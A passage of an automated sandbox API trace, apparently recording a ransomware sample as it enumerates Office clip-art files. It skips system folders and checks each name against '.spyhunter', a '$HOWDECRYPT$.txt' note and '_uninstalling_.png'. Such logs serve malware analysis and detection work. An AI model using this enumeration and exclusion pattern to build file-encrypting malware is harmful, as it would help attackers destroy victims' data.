(HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38fe90 [0098.148] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2290) returned 0x2c16890 [0098.148] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.148] lstrcmpiW (lpString1="J0099202.GIF", lpString2="Windows") returned -1 [0098.148] lstrlenW (lpString="Windows") returned 7 [0098.148] lstrcmpiW (lpString1="J0099202.GIF", lpString2="$Recycle.bin") returned 1 [0098.148] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.148] lstrcmpiW (lpString1="J0099202.GIF", lpString2="System Volume Information") returned -1 [0098.148] lstrlenW (lpString="System Volume Information") returned 25 [0098.148] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099202.GIF") returned 67 [0098.148] StrStrIW (lpFirst="J0099202.GIF", lpSrch=".spyhunter") returned 0x0 [0098.148] lstrcmpW (lpString1="J0099202.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.148] lstrcmpW (lpString1="J0099202.GIF", lpString2="_uninstalling_.png") returned 1 [0098.148] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099202.GIF") returned 67 [0098.148] GetProcessHeap () returned 0x2c0000 [0098.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38ff60 [0098.148] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2298) returned 0x2c16890 [0098.148] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.148] lstrcmpiW (lpString1="J0099203.GIF", lpString2="Windows") returned -1 [0098.148] lstrlenW (lpString="Windows") returned 7 [0098.149] lstrcmpiW (lpString1="J0099203.GIF", lpString2="$Recycle.bin") returned 1 [0098.149] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.149] lstrcmpiW (lpString1="J0099203.GIF", lpString2="System Volume Information") returned -1 [0098.149] lstrlenW (lpString="System Volume Information") returned 25 [0098.149] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099203.GIF") returned 67 [0098.149] StrStrIW (lpFirst="J0099203.GIF", lpSrch=".spyhunter") returned 0x0 [0098.149] lstrcmpW (lpString1="J0099203.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.149] lstrcmpW (lpString1="J0099203.GIF", lpString2="_uninstalling_.png") returned 1 [0098.149] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099203.GIF") returned 67 [0098.149] GetProcessHeap () returned 0x2c0000 [0098.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x390030 [0098.149] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x22a0) returned 0x2c16890 [0098.149] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.149] lstrcmpiW (lpString1="J0099204.WMF", lpString2="Windows") returned -1 [0098.149] lstrlenW (lpString="Windows") returned 7 [0098.149] lstrcmpiW (lpString1="J0099204.WMF", lpString2="$Recycle.bin") returned 1 [0098.149] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.149] lstrcmpiW (lpString1="J0099204.WMF", lpString2="System Volume Information") returned -1 [0098.149] lstrlenW (lpString="System Volume Information") returned 25 [0098.149] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099204.WMF") returned 67 [0098.149] StrStrIW (lpFirst="J0099204.WMF", lpSrch=".spyhunter") returned 0x0 [0098.149] lstrcmpW (lpString1="J0099204.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.150] lstrcmpW (lpString1="J0099204.WMF", lpString2="_uninstalling_.png") returned 1 [0098.150] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099204.WMF") returned 67 [0098.150] GetProcessHeap () returned 0x2c0000 [0098.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x390100 [0098.150] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x22a8) returned 0x2c16890 [0098.150] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.150] lstrcmpiW (lpString1="J0099205.WMF", lpString2="Windows") returned -1 [0098.150] lstrlenW (lpString="Windows") returned 7 [0098.150] lstrcmpiW (lpString1="J0099205.WMF", lpString2="$Recycle.bin") returned 1 [0098.150] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.150] lstrcmpiW (lpString1="J0099205.WMF", lpString2="System Volume Information") returned -1 [0098.150] lstrlenW (lpString="System Volume Information") returned 25 [0098.150] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099205.WMF") returned 67 [0098.150] StrStrIW (lpFirst="J0099205.WMF", lpSrch=".spyhunter") returned 0x0 [0098.150] lstrcmpW (lpString1="J0099205.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.150] lstrcmpW (lpString1="J0099205.WMF", lpString2="_uninstalling_.png") returned 1 [0098.150] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099205.WMF") returned 67 [0098.150] GetProcessHeap () returned 0x2c0000 [0098.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3901d0 [0098.150] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x22b0) returned 0x2c16890 [0098.150] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.151] lstrcmpiW (lpString1="J0101856.BMP", lpString2="Windows") returned -1 [0098.151] lstrlenW (lpString="Windows") returned 7 [0098.151] lstrcmpiW (lpString1="J0101856.BMP", lpString2="$Recycle.bin") returned 1 [0098.151] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.151] lstrcmpiW (lpString1="J0101856.BMP", lpString2="System Volume Information") returned -1 [0098.151] lstrlenW (lpString="System Volume Information") returned 25 [0098.151] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101856.BMP") returned 67 [0098.151] StrStrIW (lpFirst="J0101856.BMP", lpSrch=".spyhunter") returned 0x0 [0098.151] lstrcmpW (lpString1="J0101856.BMP", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.151] lstrcmpW (lpString1="J0101856.BMP", lpString2="_uninstalling_.png") returned 1 [0098.151] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101856.BMP") returned 67 [0098.151] GetProcessHeap () returned 0x2c0000 [0098.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3902a0 [0098.151] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x22b8) returned 0x2c16890 [0098.151] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.151] lstrcmpiW (lpString1="J0101857.BMP", lpString2="Windows") returned -1 [0098.151] lstrlenW (lpString="Windows") returned 7 [0098.151] lstrcmpiW (lpString1="J0101857.BMP", lpString2="$Recycle.bin") returned 1 [0098.151] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.151] lstrcmpiW (lpString1="J0101857.BMP", lpString2="System Volume Information") returned -1 [0098.151] lstrlenW (lpString="System Volume Information") returned 25 [0098.151] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101857.BMP") returned 67 [0098.151] StrStrIW (lpFirst="J0101857.BMP", lpSrch=".spyhunter") returned 0x0 [0098.152] lstrcmpW (lpString1="J0101857.BMP", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.152] lstrcmpW (lpString1="J0101857.BMP", lpString2="_uninstalling_.png") returned 1 [0098.152] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101857.BMP") returned 67 [0098.152] GetProcessHeap () returned 0x2c0000 [0098.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x390370 [0098.152] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x22c0) returned 0x2c16890 [0098.152] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.152] lstrcmpiW (lpString1="J0101858.BMP", lpString2="Windows") returned -1 [0098.152] lstrlenW (lpString="Windows") returned 7 [0098.152] lstrcmpiW (lpString1="J0101858.BMP", lpString2="$Recycle.bin") returned 1 [0098.152] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.152] lstrcmpiW (lpString1="J0101858.BMP", lpString2="System Volume Information") returned -1 [0098.152] lstrlenW (lpString="System Volume Information") returned 25 [0098.153] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP") returned 67 [0098.153] StrStrIW (lpFirst="J0101858.BMP", lpSrch=".spyhunter") returned 0x0 [0098.153] lstrcmpW (lpString1="J0101858.BMP", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.153] lstrcmpW (lpString1="J0101858.BMP", lpString2="_uninstalling_.png") returned 1 [0098.153] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP") returned 67 [0098.153] GetProcessHeap () returned 0x2c0000 [0098.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x390440 [0098.153] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x22c8) returned 0x2c16890 [0098.153] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.153] lstrcmpiW (lpString1="J0101859.BMP", lpString2="Windows") returned -1 [0098.153] lstrlenW (lpString="Windows") returned 7 [0098.153] lstrcmpiW (lpString1="J0101859.BMP", lpString2="$Recycle.bin") returned 1 [0098.153] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.154] lstrcmpiW (lpString1="J0101859.BMP", lpString2="System Volume Information") returned -1 [0098.154] lstrlenW (lpString="System Volume Information") returned 25 [0098.154] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP") returned 67 [0098.154] StrStrIW (lpFirst="J0101859.BMP", lpSrch=".spyhunter") returned 0x0 [0098.154] lstrcmpW (lpString1="J0101859.BMP", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.154] lstrcmpW (lpString1="J0101859.BMP", lpString2="_uninstalling_.png") returned 1 [0098.154] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP") returned 67 [0098.154] GetProcessHeap () returned 0x2c0000 [0098.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x390510 [0098.154] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x22d0) returned 0x2c16890 [0098.154] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.154] lstrcmpiW (lpString1="J0101860.BMP", lpString2="Windows") returned -1 [0098.154] lstrlenW (lpString="Windows") returned 7 [0098.154] lstrcmpiW (lpString1="J0101860.BMP", lpString2="$Recycle.bin") returned 1 [0098.154] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.154] lstrcmpiW (lpString1="J0101860.BMP", lpString2="System Volume Information") returned -1 [0098.154] lstrlenW (lpString="System Volume Information") returned 25 [0098.154] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101860.BMP") returned 67 [0098.154] StrStrIW (lpFirst="J0101860.BMP", lpSrch=".spyhunter") returned 0x0 [0098.154] lstrcmpW (lpString1="J0101860.BMP", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.154] lstrcmpW (lpString1="J0101860.BMP", lpString2="_uninstalling_.png") returned 1 [0098.155] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101860.BMP") returned 67 [0098.155] GetProcessHeap () returned 0x2c0000 [0098.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3905e0 [0098.155] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x22d8) returned 0x2c16890 [0098.155] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.155] lstrcmpiW (lpString1="J0101861.BMP", lpString2="Windows") returned -1 [0098.155] lstrlenW (lpString="Windows") returned 7 [0098.155] lstrcmpiW (lpString1="J0101861.BMP", lpString2="$Recycle.bin") returned 1 [0098.155] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.155] lstrcmpiW (lpString1="J0101861.BMP", lpString2="System Volume Information") returned -1 [0098.155] lstrlenW (lpString="System Volume Information") returned 25 [0098.155] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101861.BMP") returned 67 [0098.155] StrStrIW (lpFirst="J0101861.BMP", lpSrch=".spyhunter") returned 0x0 [0098.155] lstrcmpW (lpString1="J0101861.BMP", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.155] lstrcmpW (lpString1="J0101861.BMP", lpString2="_uninstalling_.png") returned 1 [0098.155] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101861.BMP") returned 67 [0098.155] GetProcessHeap () returned 0x2c0000 [0098.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3906b0 [0098.155] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x22e0) returned 0x2c16890 [0098.155] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.155] lstrcmpiW (lpString1="J0101862.BMP", lpString2="Windows") returned -1 [0098.155] lstrlenW (lpString="Windows") returned 7 [0098.156] lstrcmpiW (lpString1="J0101862.BMP", lpString2="$Recycle.bin") returned 1 [0098.156] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.156] lstrcmpiW (lpString1="J0101862.BMP", lpString2="System Volume Information") returned -1 [0098.156] lstrlenW (lpString="System Volume Information") returned 25 [0098.156] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101862.BMP") returned 67 [0098.156] StrStrIW (lpFirst="J0101862.BMP", lpSrch=".spyhunter") returned 0x0 [0098.156] lstrcmpW (lpString1="J0101862.BMP", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.156] lstrcmpW (lpString1="J0101862.BMP", lpString2="_uninstalling_.png") returned 1 [0098.156] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101862.BMP") returned 67 [0098.156] GetProcessHeap () returned 0x2c0000 [0098.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x390780 [0098.156] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x22e8) returned 0x2c16890 [0098.156] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.156] lstrcmpiW (lpString1="J0101863.BMP", lpString2="Windows") returned -1 [0098.156] lstrlenW (lpString="Windows") returned 7 [0098.156] lstrcmpiW (lpString1="J0101863.BMP", lpString2="$Recycle.bin") returned 1 [0098.156] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.156] lstrcmpiW (lpString1="J0101863.BMP", lpString2="System Volume Information") returned -1 [0098.156] lstrlenW (lpString="System Volume Information") returned 25 [0098.156] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP") returned 67 [0098.156] StrStrIW (lpFirst="J0101863.BMP", lpSrch=".spyhunter") returned 0x0 [0098.157] lstrcmpW (lpString1="J0101863.BMP", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.157] lstrcmpW (lpString1="J0101863.BMP", lpString2="_uninstalling_.png") returned 1 [0098.157] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP") returned 67 [0098.157] GetProcessHeap () returned 0x2c0000 [0098.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x390850 [0098.157] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x22f0) returned 0x2c16890 [0098.157] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.157] lstrcmpiW (lpString1="J0101864.BMP", lpString2="Windows") returned -1 [0098.157] lstrlenW (lpString="Windows") returned 7 [0098.157] lstrcmpiW (lpString1="J0101864.BMP", lpString2="$Recycle.bin") returned 1 [0098.157] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.157] lstrcmpiW (lpString1="J0101864.BMP", lpString2="System Volume Information") returned -1 [0098.157] lstrlenW (lpString="System Volume Information") returned 25 [0098.157] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101864.BMP") returned 67 [0098.157] StrStrIW (lpFirst="J0101864.BMP", lpSrch=".spyhunter") returned 0x0 [0098.157] lstrcmpW (lpString1="J0101864.BMP", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.157] lstrcmpW (lpString1="J0101864.BMP", lpString2="_uninstalling_.png") returned 1 [0098.157] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101864.BMP") returned 67 [0098.157] GetProcessHeap () returned 0x2c0000 [0098.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x390920 [0098.157] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x22f8) returned 0x2c16890 [0098.158] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.158] lstrcmpiW (lpString1="J0101865.BMP", lpString2="Windows") returned -1 [0098.158] lstrlenW (lpString="Windows") returned 7 [0098.158] lstrcmpiW (lpString1="J0101865.BMP", lpString2="$Recycle.bin") returned 1 [0098.158] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.158] lstrcmpiW (lpString1="J0101865.BMP", lpString2="System Volume Information") returned -1 [0098.158] lstrlenW (lpString="System Volume Information") returned 25 [0098.158] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101865.BMP") returned 67 [0098.158] StrStrIW (lpFirst="J0101865.BMP", lpSrch=".spyhunter") returned 0x0 [0098.158] lstrcmpW (lpString1="J0101865.BMP", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.158] lstrcmpW (lpString1="J0101865.BMP", lpString2="_uninstalling_.png") returned 1 [0098.158] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101865.BMP") returned 67 [0098.158] GetProcessHeap () returned 0x2c0000 [0098.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x3909f0 [0098.158] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2300) returned 0x2c16890 [0098.158] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.158] lstrcmpiW (lpString1="J0101866.BMP", lpString2="Windows") returned -1 [0098.158] lstrlenW (lpString="Windows") returned 7 [0098.158] lstrcmpiW (lpString1="J0101866.BMP", lpString2="$Recycle.bin") returned 1 [0098.158] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.158] lstrcmpiW (lpString1="J0101866.BMP", lpString2="System Volume Information") returned -1 [0098.158] lstrlenW (lpString="System Volume Information") returned 25 [0098.159] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101866.BMP") returned 67 [0098.159] StrStrIW (lpFirst="J0101866.BMP", lpSrch=".spyhunter") returned 0x0 [0098.159] lstrcmpW (lpString1="J0101866.BMP", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.159] lstrcmpW (lpString1="J0101866.BMP", lpString2="_uninstalling_.png") returned 1 [0098.159] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101866.BMP") returned 67 [0098.159] GetProcessHeap () returned 0x2c0000 [0098.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x390ac0 [0098.159] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2308) returned 0x2c16890 [0098.159] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.159] lstrcmpiW (lpString1="J0101867.BMP", lpString2="Windows") returned -1 [0098.159] lstrlenW (lpString="Windows") returned 7 [0098.159] lstrcmpiW (lpString1="J0101867.BMP", lpString2="$Recycle.bin") returned 1 [0098.159] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.159] lstrcmpiW (lpString1="J0101867.BMP", lpString2="System Volume Information") returned -1 [0098.159] lstrlenW (lpString="System Volume Information") returned 25 [0098.159] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP") returned 67 [0098.159] StrStrIW (lpFirst="J0101867.BMP", lpSrch=".spyhunter") returned 0x0 [0098.159] lstrcmpW (lpString1="J0101867.BMP", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.159] lstrcmpW (lpString1="J0101867.BMP", lpString2="_uninstalling_.png") returned 1 [0098.159] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP") returned 67 [0098.159] GetProcessHeap () returned 0x2c0000 [0098.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x390b90 [0098.160] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2310) returned 0x2c16890 [0098.160] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.167] lstrcmpiW (lpString1="J0101980.WMF", lpString2="Windows") returned -1 [0098.167] lstrlenW (lpString="Windows") returned 7 [0098.167] lstrcmpiW (lpString1="J0101980.WMF", lpString2="$Recycle.bin") returned 1 [0098.167] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.168] lstrcmpiW (lpString1="J0101980.WMF", lpString2="System Volume Information") returned -1 [0098.168] lstrlenW (lpString="System Volume Information") returned 25 [0098.168] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101980.WMF") returned 67 [0098.168] StrStrIW (lpFirst="J0101980.WMF", lpSrch=".spyhunter") returned 0x0 [0098.168] lstrcmpW (lpString1="J0101980.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.168] lstrcmpW (lpString1="J0101980.WMF", lpString2="_uninstalling_.png") returned 1 [0098.168] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101980.WMF") returned 67 [0098.168] GetProcessHeap () returned 0x2c0000 [0098.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x390c60 [0098.168] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2318) returned 0x2c16890 [0098.168] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.168] lstrcmpiW (lpString1="J0102002.WMF", lpString2="Windows") returned -1 [0098.168] lstrlenW (lpString="Windows") returned 7 [0098.168] lstrcmpiW (lpString1="J0102002.WMF", lpString2="$Recycle.bin") returned 1 [0098.168] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.168] lstrcmpiW (lpString1="J0102002.WMF", lpString2="System Volume Information") returned -1 [0098.168] lstrlenW (lpString="System Volume Information") returned 25 [0098.168] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102002.WMF") returned 67 [0098.169] StrStrIW (lpFirst="J0102002.WMF", lpSrch=".spyhunter") returned 0x0 [0098.169] lstrcmpW (lpString1="J0102002.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.169] lstrcmpW (lpString1="J0102002.WMF", lpString2="_uninstalling_.png") returned 1 [0098.169] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102002.WMF") returned 67 [0098.169] GetProcessHeap () returned 0x2c0000 [0098.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x390d30 [0098.169] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2320) returned 0x2c16890 [0098.169] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.169] lstrcmpiW (lpString1="J0102594.WMF", lpString2="Windows") returned -1 [0098.169] lstrlenW (lpString="Windows") returned 7 [0098.169] lstrcmpiW (lpString1="J0102594.WMF", lpString2="$Recycle.bin") returned 1 [0098.169] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.169] lstrcmpiW (lpString1="J0102594.WMF", lpString2="System Volume Information") returned -1 [0098.169] lstrlenW (lpString="System Volume Information") returned 25 [0098.169] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102594.WMF") returned 67 [0098.169] StrStrIW (lpFirst="J0102594.WMF", lpSrch=".spyhunter") returned 0x0 [0098.169] lstrcmpW (lpString1="J0102594.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.169] lstrcmpW (lpString1="J0102594.WMF", lpString2="_uninstalling_.png") returned 1 [0098.169] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102594.WMF") returned 67 [0098.169] GetProcessHeap () returned 0x2c0000 [0098.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x390e00 [0098.170] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2328) returned 0x2c16890 [0098.170] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.170] lstrcmpiW (lpString1="J0102762.WMF", lpString2="Windows") returned -1 [0098.170] lstrlenW (lpString="Windows") returned 7 [0098.170] lstrcmpiW (lpString1="J0102762.WMF", lpString2="$Recycle.bin") returned 1 [0098.170] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.170] lstrcmpiW (lpString1="J0102762.WMF", lpString2="System 